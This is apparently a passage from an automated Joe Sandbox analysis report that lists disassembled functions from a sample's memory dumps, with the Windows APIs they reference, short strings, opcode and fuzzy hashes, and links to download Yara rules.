
Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000023.00000002.1833777632.00007FFD9BC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9bc20000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b57042363f12484664fb5a4e612a4532c8301084b8381cbb9f38b923a36ca97
Instruction ID: 79644e319d90e9b3c1b0e4fa1b9f386964ac00730b6ad6bff9ae5a26bf1e2fc7
Opcode Fuzzy Hash: 3b57042363f12484664fb5a4e612a4532c8301084b8381cbb9f38b923a36ca97
Instruction Fuzzy Hash: C7F27A70A4991D8FDFA9EF18C8A4FA9B7B1FB68305F1401D9900DE7291DA35AE81CF44

Function 00007FFD9BAB8B98 Relevance: 1.9, APIs: 1, Instructions: 405
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32 ref: 00007FFD9BABAF9F

Memory Dump Source

Source File: 00000023.00000002.1831983982.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9bab0000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: aa030eef2d2fa0ff4adf8fee915075d83662bc01a98a32dbbfb18e685a7e7bf0
Instruction ID: 9e86cd7a6cca7f38632e4fba662421a5751f4a0d3ad9ba8de43ce6e9c6b6beee
Opcode Fuzzy Hash: aa030eef2d2fa0ff4adf8fee915075d83662bc01a98a32dbbfb18e685a7e7bf0
Instruction Fuzzy Hash: 02B13531B0DE2D4FE7689B5CD4556B937D1EB95320F01023ED06EC32A2DDA569028B81

Function 00007FFD9BB15CE0 Relevance: 1.9, APIs: 1, Instructions: 373
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000023.00000002.1831983982.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9bab0000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccb135f09e368be01f752cd7e2ea54bceb0b0e43acd48c96f7fa086d6c69888f
Instruction ID: 03409073ceeeb1c90479fa2d3237894d4e9b5935cd87524a371d80ba3deb3332
Opcode Fuzzy Hash: ccb135f09e368be01f752cd7e2ea54bceb0b0e43acd48c96f7fa086d6c69888f
Instruction Fuzzy Hash: B9A1D571B1DA4D4FE768DA5C98656B977D2FF99364F04027EE04AC32E2CE24AC068781

Function 00007FFD9BAB9D6E Relevance: 1.7, APIs: 1, Instructions: 169
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileTransactedW.KERNEL32 ref: 00007FFD9BAB9E99

Memory Dump Source

Source File: 00000023.00000002.1831983982.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9bab0000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID: CreateFileTransacted
String ID:
API String ID: 2149338676-0
Opcode ID: 7314f48fa9066860bcafd816344b7201d5d4b81e0a73ab322e625ed3d975b50d
Instruction ID: 50d522d854e878f0c32606ce73b6795d8a523da0d688d0f099aed75b4823e01c
Opcode Fuzzy Hash: 7314f48fa9066860bcafd816344b7201d5d4b81e0a73ab322e625ed3d975b50d
Instruction Fuzzy Hash: 4451E53090DB988FDB55DF58D845AA97BE0EF5A320F0442AFE089D3252CB74A841CB82

Function 00007FFD9BC2D1F1 Relevance: 1.7, Strings: 1, Instructions: 406
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

W, xrefs: 00007FFD9BC2D49A

Memory Dump Source

Source File: 00000023.00000002.1833777632.00007FFD9BC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9bc20000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID: W
API String ID: 0-655174618
Opcode ID: 624c54279310ea2ba07f886c7f073358ccd459e58dc51af4cd2ac0af9c1c13a5
Instruction ID: ab5a026b5cae3c3485206bdc0f84fa7b8a1ecbd7c9e3523077e353528007402d
Opcode Fuzzy Hash: 624c54279310ea2ba07f886c7f073358ccd459e58dc51af4cd2ac0af9c1c13a5
Instruction Fuzzy Hash: 40E1F330A0EB0A8FD378DB64D0A057977E1FF64304B1945BEC08EC36A6DE28F9418781

Function 00007FFD9BAB9EDD Relevance: 1.6, APIs: 1, Instructions: 132
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNEL32 ref: 00007FFD9BAB9FB7

Memory Dump Source

Source File: 00000023.00000002.1831983982.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9bab0000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 274249e6a315f50a69c871170175a6a742b7cb977aa050796b5c57e495df5b65
Instruction ID: 4e25d72efafd1f1607c0f507da3baed487dafa0e2686918cf03e684fa3d81e66
Opcode Fuzzy Hash: 274249e6a315f50a69c871170175a6a742b7cb977aa050796b5c57e495df5b65
Instruction Fuzzy Hash: B541A03190CA5C8FDB58DF5898597B9BBF1FB99321F04826FD049D3292CB74A845CB81

Function 00007FFD9BABAF18 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32 ref: 00007FFD9BABAF9F

Memory Dump Source

Source File: 00000023.00000002.1831983982.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9bab0000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: d6eb9d689803dcbf3ba8cbf1818417b1db91bd15011bae03a81e4574705d3360
Instruction ID: c37080569c4379492338a8aab961509125de794e9dd64fd1a5e109ead6fa6c00
Opcode Fuzzy Hash: d6eb9d689803dcbf3ba8cbf1818417b1db91bd15011bae03a81e4574705d3360
Instruction Fuzzy Hash: 9B219171908A1C9FDB58EB98C845AE9BBE1FF95321F00422FD019D3151DB7168568B81

Function 00007FFD9BC28895 Relevance: 1.6, Strings: 1, Instructions: 345
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U, xrefs: 00007FFD9BC288AA

Memory Dump Source

Source File: 00000023.00000002.1833777632.00007FFD9BC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9bc20000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: c5b947543dbe6c6c14ab42f7488ac5db7f0109353cb7ca108d586063981da60c
Instruction ID: d83cb9b2c631aad22236a8ef1fb86919deb68c0b79af638fab85459b971ac7c7
Opcode Fuzzy Hash: c5b947543dbe6c6c14ab42f7488ac5db7f0109353cb7ca108d586063981da60c
Instruction Fuzzy Hash: E0B19E30B1991D8FEBA4EB68C865AA973E1FF58318F5501B9E01DD72E6CE28EC41C741

Function 00007FFD9BC211F2 Relevance: 1.6, Strings: 1, Instructions: 320
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U, xrefs: 00007FFD9BC2152A

Memory Dump Source

Source File: 00000023.00000002.1833777632.00007FFD9BC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9bc20000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 3be2bae61e5120469daf8b59eb2df57da364b0e53d312a29d69cf5f1d9d3d122
Instruction ID: b5d5dd62f732ef76738d69ff6cb2e87da035316678f0ab119261e5bc002b737c
Opcode Fuzzy Hash: 3be2bae61e5120469daf8b59eb2df57da364b0e53d312a29d69cf5f1d9d3d122
Instruction Fuzzy Hash: 1BB1C530B19A4A8FEB59DF68C0A06A8B7A1FF59310F59417DD04EC7A96CB38F951C780

Function 00007FFD9BC23E77 Relevance: 1.6, Strings: 1, Instructions: 307
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

W, xrefs: 00007FFD9BC2407A

Memory Dump Source

Source File: 00000023.00000002.1833777632.00007FFD9BC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9bc20000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID: W
API String ID: 0-655174618
Opcode ID: 8ac5d658386bb2494fb8784118c1dcdadaf1530454cdba438e24e03607ebc950
Instruction ID: cc97f64e50d021b51180cc71fe0ae277d4c6832e06cccc0282eea33344c7fcbb
Opcode Fuzzy Hash: 8ac5d658386bb2494fb8784118c1dcdadaf1530454cdba438e24e03607ebc950
Instruction Fuzzy Hash: E521E816F0F19B9BE33955B868314BD66905F54335F1E05BFD54D8A0EACC0C66894392

Function 00007FFD9BC2650A Relevance: 1.5, Strings: 1, Instructions: 293
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U, xrefs: 00007FFD9BC267EA

Memory Dump Source

Source File: 00000023.00000002.1833777632.00007FFD9BC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9bc20000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 68c4c7d057bcf6136484bc9d43004b0791aa541a715fcdee7c20209998f859ac
Instruction ID: 925b8ad2919f8b7d2a73eefa2748463f0d8ebed9871459a9ebe53e8baa849354
Opcode Fuzzy Hash: 68c4c7d057bcf6136484bc9d43004b0791aa541a715fcdee7c20209998f859ac
Instruction Fuzzy Hash: 6BB1F730A09A4A4FE759DF78C4A06A8B7A0FF15300F5941BDD04EC7A9ADB38F951C7A0

Function 00007FFD9BC21A55 Relevance: 1.5, Strings: 1, Instructions: 284COMMON

Download Yara Rule

Strings

V, xrefs: 00007FFD9BC21CCA

Memory Dump Source

Source File: 00000023.00000002.1833777632.00007FFD9BC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9bc20000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID: V
API String ID: 0-1342839628
Opcode ID: c643ec2fe3c174e721bc58cd2d1fed20dd226c1f93374e88d13bada412fa50e2
Instruction ID: 6e5839d1a05844f4645a4ca112050c15bcbbbdc825394d3841a6941caed057db
Opcode Fuzzy Hash: c643ec2fe3c174e721bc58cd2d1fed20dd226c1f93374e88d13bada412fa50e2
Instruction Fuzzy Hash: 46B1C33061955A8FEB59CF58C0E05B437A1FF45310B6556BDC89BCB69BC638F982CB80

Function 00007FFD9BC2AFA6 Relevance: 1.5, Strings: 1, Instructions: 257COMMON

Download Yara Rule

Strings

A, xrefs: 00007FFD9BC2B0DA

Memory Dump Source

Source File: 00000023.00000002.1833777632.00007FFD9BC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9bc20000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID: A
API String ID: 0-3554254475
Opcode ID: eb9d7f8191eecd7a238becef26e282c6e5df390efbb0b0d85cbb97932a74f723
Instruction ID: 27943bb42d973dfd39a4061d75488a444d2e72ce5b941a90933be344fd8b74a2
Opcode Fuzzy Hash: eb9d7f8191eecd7a238becef26e282c6e5df390efbb0b0d85cbb97932a74f723
Instruction Fuzzy Hash: 04816B31B1EA0A8FE3389A78946527A77E1EF45314F1A057EE08FC31A2DE2CF9018741

Function 00007FFD9BC28D7C Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9BC28EEA

Memory Dump Source

Source File: 00000023.00000002.1833777632.00007FFD9BC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9bc20000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 0d23cb22ee6f405d0d51d981f8f67c54682d7b8b628a7109c40fa6b69b7c1453
Instruction ID: 7fb5c32e82cd7a48dc37995bd868e84f036a5950a5edafcdeb99a164f2ffb0c7
Opcode Fuzzy Hash: 0d23cb22ee6f405d0d51d981f8f67c54682d7b8b628a7109c40fa6b69b7c1453
Instruction Fuzzy Hash: AE91F865A0E3CA4FD3768B7444251A97FE0EF52314F0E05FED489DB1F3DA289A098352

Function 00007FFD9BC3C440 Relevance: 1.4, Strings: 1, Instructions: 198COMMON

Download Yara Rule

Strings

`5_H, xrefs: 00007FFD9BC3C471

Memory Dump Source

Source File: 00000023.00000002.1833777632.00007FFD9BC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9bc20000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID: `5_H
API String ID: 0-2112259933
Opcode ID: 23df4663705dc8bedff682fe22d5ed64960b44a3624c968f868902cc19fd3820
Instruction ID: 7bb71faab3eaf3a27e3e335a6f9e2a8314d98ee9afda87403264398380e28079
Opcode Fuzzy Hash: 23df4663705dc8bedff682fe22d5ed64960b44a3624c968f868902cc19fd3820
Instruction Fuzzy Hash: 9A516A22A0EB890FD76A967888541BE7BD0EF96340B4545BED4CEC71A7DD18A846C381

Function 00007FFD9BC34822 Relevance: 1.4, Instructions: 1433COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1833777632.00007FFD9BC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9bc20000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d283569be048c6ff2fd8886bae951e55e36725a94fc9fdb8c283bc99acc45a5
Instruction ID: 8f8b89fb85c408033aed50e6a37299cebc3fc053050fcc4978c0d06a000693cf
Opcode Fuzzy Hash: 8d283569be048c6ff2fd8886bae951e55e36725a94fc9fdb8c283bc99acc45a5
Instruction Fuzzy Hash: 79C24670A4491C8FDFA9EF18C894FA9B7B1FB68305F5041D9900EE72A5DA71AE81CF44

Function 00007FFD9BC25A34 Relevance: 1.4, Strings: 1, Instructions: 175COMMON

Download Yara Rule

Strings

A, xrefs: 00007FFD9BC25B2A

Memory Dump Source

Source File: 00000023.00000002.1833777632.00007FFD9BC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9bc20000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID: A
API String ID: 0-3554254475
Opcode ID: f4f503175d62f08588220e170d1bdbb3a4800981273208abb9687e281d0aef62
Instruction ID: b7e4cca64144d776cef08dedc2dd4a7da00b4da11051a3c1034a81696960efb8
Opcode Fuzzy Hash: f4f503175d62f08588220e170d1bdbb3a4800981273208abb9687e281d0aef62
Instruction Fuzzy Hash: 54510831B1E70A4FE3389E68945507FB7E0EF85325B19057ED4CEC36A2DA29F9428781

Function 00007FFD9BC216C8 Relevance: 1.4, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD9BC21742

Memory Dump Source

Source File: 00000023.00000002.1833777632.00007FFD9BC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9bc20000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 48fb267a8c96faf86021127ddb05a3aa45c135c02bc17469f97e9f3c99e37667
Instruction ID: bcf45c18916b8d82a2eaac09eb0971c647b1ccd83c5d671c721184210ab309b4
Opcode Fuzzy Hash: 48fb267a8c96faf86021127ddb05a3aa45c135c02bc17469f97e9f3c99e37667
Instruction Fuzzy Hash: 03516E31E0A54E8FDB69DBA8C4A55FCB7B1EF58300F1941BED01AE7292CA346A05CB50

Function 00007FFD9BC2BF48 Relevance: 1.4, Strings: 1, Instructions: 154COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD9BC2BFB2

Memory Dump Source

Source File: 00000023.00000002.1833777632.00007FFD9BC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9bc20000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: c9da0900b8cfe1f9406bd90feac8c4232a5d46a7affaa911ae172c681276551a
Instruction ID: 557bee522f4380e885abc407346d122055dac00c28555fe636990ce5f15420c5
Opcode Fuzzy Hash: c9da0900b8cfe1f9406bd90feac8c4232a5d46a7affaa911ae172c681276551a
Instruction Fuzzy Hash: 91514F71E0950E8FDB69DBA8C4A55BDB7B1FF59300F1541BAD01AE72E6CE386A01CB40

Function 00007FFD9BC26988 Relevance: 1.4, Strings: 1, Instructions: 152COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD9BC26A02

Memory Dump Source

Source File: 00000023.00000002.1833777632.00007FFD9BC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9bc20000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 9abe886dfd0f60d76bd2f643752804b88f6f10e92d2cd25a7eb700e6cd8fc26d
Instruction ID: 4c491c331fb6c5c9bf3445f0ed0db73a914469d6a0ed7f4f4de0df9317945b7a
Opcode Fuzzy Hash: 9abe886dfd0f60d76bd2f643752804b88f6f10e92d2cd25a7eb700e6cd8fc26d
Instruction Fuzzy Hash: 6F518C31E0A54E8FDB58DBA8C4655BDB7B1FF58300F1541BAE01AE72A6CE346A01CB60

Function 00007FFD9BC320F2 Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

#6_^, xrefs: 00007FFD9BC32101

Memory Dump Source

Source File: 00000023.00000002.1833777632.00007FFD9BC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9bc20000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID: #6_^
API String ID: 0-47545222
Opcode ID: 687fb010489e1a645b00ad946e080d41dd1702a350a22a9144d7f83bff3be5f7
Instruction ID: 493033fd43ab5ee99caaf3fc40835e27aecf44da6e5f60d516595146dd4f00b2
Opcode Fuzzy Hash: 687fb010489e1a645b00ad946e080d41dd1702a350a22a9144d7f83bff3be5f7
Instruction Fuzzy Hash: 4F316D32B0DA9C4FDB51DA7C98755E97BE0FF59215B1A01BBE088CB1A3CA147C02C351

Function 00007FFD9BABB1D4 Relevance: 1.4, APIs: 1, Instructions: 125memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32 ref: 00007FFD9BABB288

Memory Dump Source

Source File: 00000023.00000002.1831983982.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9bab0000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 03f39e6bc08fe6f3f2f9b950914cb7786165f7c385b0700c71affa18ab4ecfe3
Instruction ID: 17051b993a81c7868d5e3d38086e309ef5a3facba139b564aedae2725558dbf4
Opcode Fuzzy Hash: 03f39e6bc08fe6f3f2f9b950914cb7786165f7c385b0700c71affa18ab4ecfe3
Instruction Fuzzy Hash: 9D310C31A0CA8C4FDB18EB6C9C466F97BF1EB5A325F04427FD059D3192DE656806CB81

Function 00007FFD9BC28075 Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9BC2808A

Memory Dump Source

Source File: 00000023.00000002.1833777632.00007FFD9BC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9bc20000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 15ad8ce9560b5d5a5573dd5daa3985266daeee9733ac682ee40ab9fc2c8bd9b9
Instruction ID: 49fbd7be41f9f7f5f318e4a5b4ae0d4eb526eb0e304585d9c3525fc08c692a68
Opcode Fuzzy Hash: 15ad8ce9560b5d5a5573dd5daa3985266daeee9733ac682ee40ab9fc2c8bd9b9
Instruction Fuzzy Hash: 0C313930E1A54ECFEBA8DBA484A55BE77B1FF54300F59007AD40EE65E1DB38AA409741

Function 00007FFD9BC21CA0 Relevance: 1.3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

Strings

V, xrefs: 00007FFD9BC21CCA

Memory Dump Source

Source File: 00000023.00000002.1833777632.00007FFD9BC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9bc20000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID: V
API String ID: 0-1342839628
Opcode ID: 0f518053c1b206629eff2e849edb5a12deb4dd8f551d5fc2827d169cb731ed1d
Instruction ID: 351fff0cd85f42eebfca0de68aaad7b4b613a0f8be754c89cf1284622f80cbf8
Opcode Fuzzy Hash: 0f518053c1b206629eff2e849edb5a12deb4dd8f551d5fc2827d169cb731ed1d
Instruction Fuzzy Hash: B631FC10A1F5DA8BEB3A836484745B87B61EF51311F1E46BAC89A8B5E7C43CE581C781

Function 00007FFD9BC23815 Relevance: 1.3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9BC2382A

Memory Dump Source

Source File: 00000023.00000002.1833777632.00007FFD9BC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9bc20000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 750ca339ba23bf4cf0bc1206364b4d24425cccb266ddf704547ed5961cf2e447
Instruction ID: 0875db667d97d274ea8a7ff49f16c8b5a013545823f01e44df8fb8dca89b4b4f
Opcode Fuzzy Hash: 750ca339ba23bf4cf0bc1206364b4d24425cccb266ddf704547ed5961cf2e447
Instruction Fuzzy Hash: AF217C30E1994E9FCB94DBA8C8605EDBBB1FF88310F05017AD00AE72A1DA20A901CB60

Function 00007FFD9BC28ED6 Relevance: 1.3, Strings: 1, Instructions: 66COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9BC28EEA

Memory Dump Source

Source File: 00000023.00000002.1833777632.00007FFD9BC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9bc20000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 7183f8150e0c4296f7578acfc490e9ca366c133223367fd9083d134d40102e8e
Instruction ID: c6060359f68cc47ac48a65f3ad69dbc55b086f5a0a6c72b9df4de617260cd896
Opcode Fuzzy Hash: 7183f8150e0c4296f7578acfc490e9ca366c133223367fd9083d134d40102e8e
Instruction Fuzzy Hash: 3A11E630B1AA8A4FE765DF7884642797BE1FF15301F0902BAE09DDB1E2DB28E9458741

Function 00007FFD9BC29629 Relevance: 1.3, Strings: 1, Instructions: 50COMMON

Download Yara Rule

Strings

W, xrefs: 00007FFD9BC2963A

Memory Dump Source

Source File: 00000023.00000002.1833777632.00007FFD9BC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9bc20000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID: W
API String ID: 0-655174618
Opcode ID: 5804b46f28274ec2040bef020759baa71f48f1611c559ed16c3f6bf95fe9219f
Instruction ID: 8e90023ccc5926f0c68d5fa97e25d5450558cf1bf5a1fa7410b94ac6c1754a17
Opcode Fuzzy Hash: 5804b46f28274ec2040bef020759baa71f48f1611c559ed16c3f6bf95fe9219f
Instruction Fuzzy Hash: F211C411F4F19B8AF3B556B057790BD6A805F46324F1E01FAD84E8A4F6DCCC6A40D282

Function 00007FFD9BC29003 Relevance: .5, Instructions: 521COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1833777632.00007FFD9BC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9bc20000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4f514ce502970c212950fff360f4838769b07a00498e9fe30389e1cce36d896
Instruction ID: 1f8578f123ee658fc4d0c6a97beba35d417df3906e3f89160214901cc39e2aed
Opcode Fuzzy Hash: f4f514ce502970c212950fff360f4838769b07a00498e9fe30389e1cce36d896
Instruction Fuzzy Hash: 1EF10B3074C8188FDF89FB1CD4A5E6573E2EBA8755B5541A8E10FC72AACD24EC81CB91

Function 00007FFD9BC2A099 Relevance: .5, Instructions: 459COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1833777632.00007FFD9BC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9bc20000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7ace7ec208781693d52d92751e5fb04fa98c37aea75053c2b29debe5682ccd2
Instruction ID: e4a7547b8e9e80e7d927a0c2f1765d0f162a5c4c83799e3addca9b24fb3190f2
Opcode Fuzzy Hash: f7ace7ec208781693d52d92751e5fb04fa98c37aea75053c2b29debe5682ccd2
Instruction Fuzzy Hash: 7AE1A630B0DA0D8FDBA8DA58C865AB877E1FF58311F1501B9E01EC72A2DE25ED45CB81

Function 00007FFD9BC27C41 Relevance: .4, Instructions: 414COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1833777632.00007FFD9BC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9bc20000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 153881c222b23e10cb25113c70bb67091a83799e0a14fbdb7215f2d73b8939ea
Instruction ID: 530f1255c7ec4cdc2b31d31bfe3625e8f7d7a2c22a277016a1ea3502daedebaa
Opcode Fuzzy Hash: 153881c222b23e10cb25113c70bb67091a83799e0a14fbdb7215f2d73b8939ea
Instruction Fuzzy Hash: 5CE1E030A0EA4A8FE378DB78C4E057977E1FF45300B19497EC48AC36A6DA29FD428751

Function 00007FFD9BC22981 Relevance: .4, Instructions: 407COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1833777632.00007FFD9BC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9bc20000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc2a1412b37ee3daa8840fc88e7ecde978f2609b9e7444cb8045c750b3a8f9ef
Instruction ID: d9b499153dca70cea26c7bac0285fd24114c06e716e60297c0e15725c25e1588
Opcode Fuzzy Hash: cc2a1412b37ee3daa8840fc88e7ecde978f2609b9e7444cb8045c750b3a8f9ef
Instruction Fuzzy Hash: D8D1D430B0EB0A4FE378DBA8D4A157977E1FF44300B19457EC48ACB6A2DA29F946C741

Function 00007FFD9BC26BFF Relevance: .4, Instructions: 402COMMON

Download Yara Rule

Memory Dump Source

